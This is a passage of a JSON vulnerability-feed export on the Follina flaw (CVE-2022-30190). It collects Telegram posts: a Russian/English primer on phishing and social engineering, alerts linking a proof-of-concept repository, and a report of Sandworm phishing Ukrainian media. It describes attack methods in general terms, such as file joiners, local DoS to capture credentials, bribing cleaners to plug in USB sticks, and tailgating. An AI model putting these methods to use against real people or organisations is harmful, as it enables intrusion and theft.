Office.\n\u041a\u043e\u0433\u0434\u0430 \u0447\u0442\u043e-\u0442\u043e \u0438\u0434\u0435\u0442 \u043d\u0435 \u0442\u0430\u043a \u0441 Windows \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u0438\u0437 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0447\u0435\u0440\u0435\u0437 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 URL-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b MSDT. \n\u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u0432\u044b\u0437\u0432\u0430\u0432\u0448\u0435\u0433\u043e MSDT, \u0442\u043e \u0435\u0441\u0442\u044c \u0432 \u043d\u0430\u0448\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043e\u0442\u043a\u0440\u044b\u0432\u0448\u0435\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b.\n\u041f\u043e\u0434\u043e\u0431\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \n\n\u0415\u0449\u0435 \u0434\u043b\u044f \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u0432\u0435\u0431 \u0441\u0430\u0439\u0442\u044b . \n\u042d\u0442\u043e \u0442\u043e\u0436\u0435 \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u0432\u0435\u0441\u044c\u043c\u0430 \u043f\u0440\u043e\u0441\u0442\u043e . \n\u0415\u0441\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433 \u043a\u043e\u0433\u0434\u0430 \u0445\u0430\u043a\u0435\u0440 \u0443\u0436\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u044c\u0441\u044f \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0438 \u0435\u043c\u0443 \u043d\u0443\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c \u043f\u0430\u0440\u043e\u043b\u0438 \u0434\u043b\u044f \u0432\u0445\u043e\u0434\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 . \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u044e\u0437\u0430\u044e\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u043e\u0441 \u0430\u0442\u0430\u043a\u0438 \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e pyersinia \u0447\u0442\u043e\u0431\u044b \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432\u044b \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043b\u043e\u0441\u044c, \u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0433 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0432\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 . \n\u0412\u043e\u0442 \u0441\u0430\u0442\u044c\u044f \u043f\u0440\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u0434\u0430\u043d\u043d\u044b\u0445 \u0447\u0435\u0440\u0435\u0437 wireshark \n\n\u0422\u0435\u043f\u0435\u0440\u044c \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e\u0431 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 , \u0433\u0434\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0434\u043e\u043b\u0436\u0435\u043d \"\u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c\" .\n\u041f\u0435\u0440\u0432\u043e\u0435, \u0447\u0442\u043e \u043f\u0440\u043e\u0445\u043e\u0434\u0438 \u0432 \u0433\u043e\u043b\u043e\u0432\u0443 \u044d\u0442\u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u044f \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 .  \u041a\u0430\u043a \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f \"\u0441\u0430\u043c\u043e\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0435 \u0437\u0432\u0435\u043d\u043e \u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u044d\u0442\u043e \u0443\u0431\u043e\u0440\u0449\u0438\u0446\u0430\" - \u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043e\u043d\u0430 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u0442 \u0432 \u043a\u043e\u043c\u043f\u0430\u0445 , \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u043b\u0430\u0442\u0438\u0442\u044c \u0435\u0439 \u0438 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u0442\u044c \u0432\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0444\u043b\u0435\u0448\u043a\u0443\ud83e\udda0  \u0418\u043b\u0438 \u043f\u043e\u043c\u043d\u0438\u0442\u0435 \u043a\u0430\u043a \u0434\u0435\u043b\u0430\u043b\u0438 \u043b\u0430\u043f\u0441\u0443\u0441 (\u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043f\u0440\u043e\u0441\u0438\u043b\u0438 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 \u043d\u0438\u043c\u0438 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u0447\u0430\u0442\u044c ) . \n\u0415\u0449\u0435 \u0435\u0441\u043b\u0438 \u0443\u0436 \u043d\u0438\u043a\u043e\u0433\u043e \u0438\u0437 \u043d\u0435 \u0432\u044b\u0448\u043b\u043e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u0442\u044c , \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441\u0430\u043c\u043e\u043c\u0443 . \u0414\u043b\u044f \u0442\u0430\u043a\u043e\u0433\u043e \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0442\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u043c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u0438\u043b\u0438 \u044f \u0433\u0434\u0435-\u0442\u043e \u0432\u0438\u0434\u0435\u043b\u0430 \u0447\u0442\u043e \u043e\u043d\u0438 \u0440\u043e\u044e\u0442\u0441\u044f \u0432 \u043e\u0444\u0438\u0441\u043d\u044b\u0445 \u043c\u0443\u0441\u043e\u0440\u043d\u044b\u0445 \u0431\u0430\u043a\u0430\u0445(\u043d\u0438\u0447\u0435\u0433\u043e \u0441\u043c\u0435\u0448\u043d\u043e\u0433\u043e \u043a\u0442\u043e-\u0442\u043e \u0442\u0443\u0434\u0430 \u0432\u044b\u043a\u0438\u0434\u044b\u0432\u0430\u0435\u0442 \u043f\u0430\u0440\u043e\u043b\u0438)  , \u0435\u0449\u0435 \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443, \u0434\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u0437\u0434\u0430\u043d\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043e\u043d\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u043e\u0441\u0442\u043e \u0443\u0432\u0435\u0440\u0435\u043d\u043d\u043e \u0438\u0434\u0442\u0438 \u0437\u0430 \u043a\u0435\u043c \u0442\u043e.\n\u0412\u043e\u043e\u0431\u0449\u0435 \u0435\u0441\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u0441\u0442\u0440\u043e\u0433\u0438\u0435 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043c\u0435\u0441\u0442\u0430 , \u0442\u0430\u043c \u043e\u043d\u0438 \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u044e\u0442 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u0438\u043b\u0438 \u043f\u0440\u043e\u0432\u043e\u0434\u044f\u0442 \u0434\u0440\u0443\u0433\u0438\u0435 \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0438 \u0438\u043c\u0435\u043d\u043d\u043e \u0441 \u043d\u0438\u043c\u0438 ..\n\u041d\u0435\u043c\u043d\u043e\u0433\u043e \u0437\u0430\u0442\u0440\u043e\u043d\u0443 \u043a\u0430\u043a \u0441 \u044d\u0442\u0438\u043c \u0431\u043e\u0440\u043e\u0442\u044c\u0441\u044f .\n\u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0431\u044b\u0442\u044c \u0431\u043e\u043b\u0435\u0435 \u0431\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 , \u043d\u0435 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u0441 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e \u043f\u043a \u043a\u0430\u043a\u0438\u0435-\u043b\u0438\u0431\u043e \u0441\u0432\u043e\u0438 \u043f\u0438\u0441\u044c\u043c\u0430 \u043d\u0430 email  \u0441 \u043d\u0435\u0437\u043d\u0430\u043a\u043e\u043c\u044b\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 , \u043d\u0435 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u0442\u044c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0430\u043c , \u0447\u0430\u0449\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0441\u0435\u0442\u044c \u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u0438 \u0432\u043e\u043e\u0431\u0449\u0435 \u0431\u043e\u043b\u0435\u0435 \u0431\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u044c\u0441\u044f \u043a\u043e \u0432\u0441\u0435\u043c\u0443 .  \u041d\u0430\u0441\u0447\u0435\u0442 \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0432\u0438\u0434\u0430: \u043a\u0430\u043a \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 , \u043d\u0443 \u044d\u0442\u043e \u0432\u0435\u0441\u044c\u043c\u0430 \u0441\u043b\u043e\u0436\u043d\u044b\u0439 \u0432\u043e\u043f\u0440\u043e\u0441 - \u043d\u0430\u0432\u0435\u0440\u043d\u043e\u0435 \u0441\u0442\u043e\u0438\u0442 \u0447\u0430\u0449\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 . \u0412\u043e\u043e\u0431\u0449\u0435 \u0442\u0435\u043c\u0430 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043e\u0431\u0448\u0438\u0440\u043d\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043c\u043d\u043e\u0433\u0438\u0435 \u0441\u0444\u0435\u0440\u044b \u0436\u0438\u0437\u043d\u0438  ,\u041d\u041e \u044f \u0434\u0443\u043c\u0430\u044e \u043a\u043e\u0440\u043e\u0442\u043a\u043e \u0432\u044b \u043f\u043e\u043d\u044f\u043b\u0438. \u0415\u0441\u043b\u0438 \u0447\u0442\u043e  \u044f \u043f\u0440\u0438\u043a\u0440\u0435\u043f\u043b\u044e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0442\u0430\u0442\u0435\u0439 \u043f\u0440\u043e \u043c\u0435\u0442\u043e\u0434\u044b \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 \u043d\u0438\u0436\u0435 . \n\u0410 \u0442\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0447\u0430\u0441\u0442\u0438 .\n#virus #social_engineering", "creation_timestamp": "2022-09-24T08:34:34.000000Z"}, {"uuid": "3a110461-749a-4367-9669-e2e68114e013", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3636", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of concept for CVE-2022-30190 (Follina).\nURL\uff1ahttps://github.com/winstxnhdw/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-12-26T21:47:18.000000Z"}, {"uuid": "3a804d2b-9449-46de-b35f-68e7548527d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2521", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThese are the source codes of the Python scripts to apply the temporary protection against the CVE-2022-30190 vulnerability (Follina)\nURL\uff1ahttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-16T20:50:32.000000Z"}, {"uuid": "6b0f248c-ef93-4c21-b455-013c26c08b84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/technical_private_cat/191", "content": "Part 1 - social engineering\n\nFirst I want to talk about social engineering. \nWhat is social engineering? \nIt is methods of influencing a person to do what you want him to do. \n\nBut what methods hackers use and what tools and resources do they use? \n\nThe first and most famous type I want to talk about is phishing. \nFor me phishing is divided into two types - mass and targeted (those who knows can correct). \n\"Bulk phishing\" is a kind of mass general delivery of let's say emails with malicious files, links, threat notifications etc. with some kind of general concept.  \n\nAnd directed is phishing, which is aimed at a particular person - for example, deputy director of the company. To do so, phishers first use methods a la OSINT to collect information about a target and then they compose phishing attacks.  \nTo hide an exe in any other format they use different file joyners or work with asm exe files themselves. Then they make up a more or less convincing story or just send it to the victim(s). Another example about sending documents is the infamous CVE-2022-30190, which contains exploits, see.\nWhat does it do?  \nThis vulnerability can be exploited via a malicious MS Office document.\nWhen something goes wrong with Windows it can invoke from other applications via a special MSDT URL protocol. \nIf the vulnerability is exploited successfully, the attacker can run arbitrary code with the privileges of the application that invoked MSDT, i.e. in our case with the privileges of the user who opened the malicious file.\nSimilar vulnerability and exploit \n\nPhishing can also be done via fake websites. \nThis is also very easy to do. \nThere are phishing attempts when a hacker is already in the local network and needs to get passwords to log on to the server and download the malware. For this, most often a local attack using local dos attacks for example with pyersinia to the victim device is restarted, and the attacker could intercept the data entered. \nHere is a wireshark article about data hijacking \n\nNow let's talk about the social engineering, where the intruder must be \"present\".\nThe first thing that comes to mind is the compromise of the employees.  As they say \"the most vulnerable part of the server is the cleaner\" - Because she does not know anything about computers, the intruder can pay her and ask to insert a flash drive\ud83e\udda0 Or remember how lapsus did (asking directly the companies employees to cooperate with them) . \nEven if no one from the failed to compromise or hack, the attacker has to act himself. For such a hacker can pretend to be an employee of the company, or I've seen somewhere that they dig in the office trash (nothing funny someone throws out passwords there), even for example, to get into the company building, they can just confidently go after someone else.\nIn general, if more stringent on the security of places, there they are more likely to compromise employees or conduct other manipulations with them ...\nA little touch on how to deal with it.\nFirst of all be more vigilant, do not open any e-mails from unknown addresses, do not click on links, more often check the network in the company for suspicious actions, and in general be more vigilant to everything.  Concerning the second type: how to avoid compromise, well this is a very difficult question - probably check the employees more often. In general the topic of social engineering is quite vast and affects many areas of life, BUT I think you understood in brief. If anything, I'll attach a few articles about social engineering methods below. \nAnd then you can move on to the next part.\n #virus #social_engineering", "creation_timestamp": "2022-09-24T08:33:34.000000Z"}, {"uuid": "b0c09fb6-555b-4216-bab9-346ba17d1049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/JqVwQ-JC9B9ph46qq_gs1KPvHPPLX-_sQPp9do9RGc2keWM", "content": "", "creation_timestamp": "2026-04-10T21:00:05.000000Z"}, {"uuid": "27040cbf-7dbd-4570-9998-122d29149439", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/8wPJR4Zrqe1NVpmz6R4R-oJOE4FmewBY2nxE00bK5aCo0SE", "content": "", "creation_timestamp": "2025-10-18T19:00:11.000000Z"}, {"uuid": "a79ef736-c40a-4873-aed8-160fc4fb8943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/ZHsH8l_PJf6qA-LG3pwKoQfrYnUBM4bmr6171DkIh35gCrQ", "content": "", "creation_timestamp": "2025-10-18T21:00:05.000000Z"}, {"uuid": "1ae98914-a449-460f-be44-61fd4f13aaf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/825", "content": "\u200b\ud83c\udde8\ud83c\uddf3 \u0425\u0430\u043a\u0435\u0440\u044b Sandworm \u0430\u0442\u0430\u043a\u0443\u044e\u0442 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina.\n\n\ud83d\udcac \u041f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u044b\u0435 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u044b \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u0443\u0437\u043d\u0430\u043b\u0430 \u043e \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438: \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0437 \u0420\u043e\u0441\u0441\u0438\u0438 \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u044e\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u043c \u0421\u041c\u0418 (\u0440\u0430\u0434\u0438\u043e\u0441\u0442\u0430\u043d\u0446\u0438\u044f\u043c, \u0433\u0430\u0437\u0435\u0442\u0430\u043c, \u043d\u043e\u0432\u043e\u0441\u0442\u043d\u044b\u043c \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u0430\u043c \u0438 \u043f\u0440.). \u0412 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 CERT-UA \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0441\u0432\u044b\u0448\u0435 500 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u0435\u0439.\n\n\u041f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0442\u0435\u043c\u043e\u0439 \u00ab\u0421\u043f\u0438\u0441\u043e\u043a \u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u043a\u0430\u0440\u0442\u044b\u00bb \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u044e\u0442\u0441\u044f \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u044f\u0449\u0438\u043a\u043e\u0432 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0439. \u0412 \u043d\u0438\u0445 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442\u0441\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u00ab\u0421\u041f\u0418\u0421\u041e\u041a\u043f\u043e\u0441\u0438\u043b\u0430\u043d\u044c\u043d\u0430\u0456\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u0456\u043a\u0430\u0440\u0442\u0438.docx\u00bb, \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f HTML-\u0444\u0430\u0439\u043b \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f JavaScript-\u043a\u043e\u0434, \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0449\u0438\u0439 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0438\u0439 EXE-\u0444\u0430\u0439\u043b 2.txt. \u042d\u0442\u043e\u0442 \u0444\u0430\u0439\u043b \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e CrescentImp.\n\n\u0412 \u0445\u043e\u0434\u0435 \u0430\u0442\u0430\u043a\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u0432 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u043a\u0438 Microsoft Windows Support Diagnostic Tool (MSDT), \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0443\u044e \u043a\u0430\u043a Follina. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Windows. \u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0442 Microsoft \u0434\u043b\u044f \u043d\u0435\u0435 \u043d\u0435\u0442, \u043e\u0434\u043d\u0430\u043a\u043e \u043d\u0430 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 0patch \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0442\u0447.\n\n\u041a\u0430\u043a \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442 CERT-UA, \u0437\u0430 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u043c\u0438 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u043d\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418 \u043c\u043e\u0436\u0435\u0442 \u0441\u0442\u043e\u044f\u0442\u044c APT-\u0433\u0440\u0443\u043f\u043f\u0430 Sandworm, \u0441\u0432\u044f\u0437\u044b\u0432\u0430\u0435\u043c\u0430\u044f \u0441 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e\u043c 